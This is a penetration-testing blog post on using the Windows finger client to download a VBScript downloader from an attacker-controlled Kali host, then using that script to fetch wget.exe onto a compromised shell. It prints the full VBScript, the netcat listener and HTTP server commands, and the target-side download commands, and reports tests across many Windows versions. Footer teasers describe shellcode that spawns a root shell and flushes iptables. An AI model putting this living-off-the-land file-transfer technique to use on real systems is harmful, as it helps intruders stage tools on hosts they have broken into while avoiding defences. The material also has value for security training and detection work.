Skip to main content

Use Finger To Download

Today I saw a twitter post by @DissectMalware about using finger to download data. I thought I would try it and see if I could find a good purpose for it (it is limited to textual data).

One annoying thing I find is when attempting to do file transfer on a Windows host that does not have a TFTP client or PowerShell. The solution is to paste in a 25 line VBScript. This wouldn't be so bad but usually I find I am restricted on a shell to pasting in at most 5 lines at a time and sometimes even less without corruption of the resulting script. The only way to know if the resulting script was successfully pasted is to type it out and examine all 25 lines (if they all made it into the file). Just running the script without knowing it is correct risks losing the shell. I have hung my shell more than once.

By the way don't bother trying the FTP client. The challenge is more than just that you have to create a script file so you can run it non-interactively. Besides having Windows Defender flag the FTP script file as malicious the FTP client on Windows does not work in passive mode. In other words it always trys to open a port for the returning data connection which pops up a GUI alert on Vista if the firewall is enabled and the user has not already chosen to allow this application etc..

The wget.vbs script:
strUrl = WScript.Arguments.Item(0)
StrFile = WScript.Arguments.Item(1)
Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0
Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0
Const HTTPREQUEST_PROXYSETTING_DIRECT = 1
Const HTTPREQUEST_PROXYSETTING_PROXY = 2
Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts
Err.Clear
Set http = Nothing
Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")
If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")
If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")
http.Open "GET", strURL, False
http.Send
varByteArray = http.ResponseBody
Set http = Nothing
Set fs = CreateObject("Scripting.FileSystemObject")
Set ts = fs.CreateTextFile(StrFile, True)
strData = ""
strBuffer = ""
For lngCounter = 0 to UBound(varByteArray)
ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1)))
Next
ts.Close
POC
With this Proof Of Concept my goal is simply to download the wget.vbs script using finger and then use it to successfully download the wget.exe so that it can be used for further downloads.

The target has the firewall enabled:


On Kali:
Set up an HTTP listener someplace where the wget.exe file can be fetched:
cd /usr/share/windows-binaries/
python -m SimpleHTTPServer 80

Set up netcat to listen for a connection to the finger port and then push our wget.vbs script:
nc -lnvp 79 -q1 < wget.vbs

-q secs            quit after EOF on stdin and delay of secs

On Windows Vista 32bit:
Create or switch to a directory that your current user is permitted to create files in:
mkdir \temp
cd \temp


Download the script:
set HOSTIP=10.0.0.22
finger @%HOSTIP% >script.txt && more +2 script.txt >wget.vbs


Finger outputs a couple of lines before printing the script contents so we use "more" to strip those first 2 lines.

Use the downloaded script to fetch the wget.exe:
cscript wget.vbs http://%HOSTIP%/wget.exe wget.exe

We see that the downloaded wget.exe file is functional.

Tested now on default installs of:
Windows Server 2000
Windows XP SP1
Windows XP SP2
Windows 2003 Server
Windows Vista 32 bit
Windows Server 2008 Standard SP1 32bit
Windows 7 32 bit
Windows 7 64 bit
Windows 8 32 bit
Windows 8 64 bit
Windows Server 2012 R2
Windows 10 Pro 64 bit

The only issue so far was on Windows 2000, the finger process worked perfectly. The VBScript
had an error.

P.S.  @DissectMalware wanted to mention that it is possible to encode binary data, transfer it to the client and then decode it on the client. If you are taking the Offsec training one method of doing that suggests using debug.exe on the client to reassemble the executable.


Comments

Popular posts from this blog

GIAC GXPN Review – SANS SEC660 (Advanced Penetration Testing, Exploit Writing, and Ethical Hacking)   Intro  SANS is a well respected and premier cyber security training company that employs industry experts as instructors. GIAC is a company that produces testing to validate the skills of security professionals. GIAC exams validate the learning outcomes of the SANS courses. Prerequisites Before attempting this course you should be familiar with penetration testing as this is an advanced course. I would say that you should also be familiar with assembly language and shellcoding. It would be best if you have studied basic stack overflow exploits prior to this course. You will need a basic understanding of programming in C or C++ (preferably both). Scripting using Python would be a useful prerequisite. If you could learn a bit of Ruby scripting it would help for the Metasploit module creation. Be familiar with various routing and networking protocols. Course Coverage This course covers ma

PolySetuidExecve1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version: http://shell-storm.org/shellcode/files/shellcode-77.php My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolySetuidExecve1434.nasm Published : https://www.exploit-db.com/exploits/41498/ Original Shellcode bytes = 49 My version: Number of bytes = 31 Number of nulls = 0 PolySetuidExecve1434.nasm Intro This shellcode when executed will first setuid(0) and then execute /bin/sh and provide you with a shell. The purpose of calling setuid(0) is, suppose that you have managed to inject this shellcode into an executable that is Set-UID root. I

PolyFlushIPTables1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version: http://shell-storm.org/shellcode/files/shellcode-683.php Original size: 50 bytes (don't believe what he says :) My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolyFlushIPTables1434.nasm Published : https://www.exploit-db.com/exploits/41503/ My version: Number of bytes = 47 Number of nulls = 0 PolyFlushIPTables1434.nasm  Intro This shellcode basically just executes /sbin/iptables -F without any other parameters. man iptables "-F, --flush [chain]               Flush  the  selected  chain (all the chains in the table if none i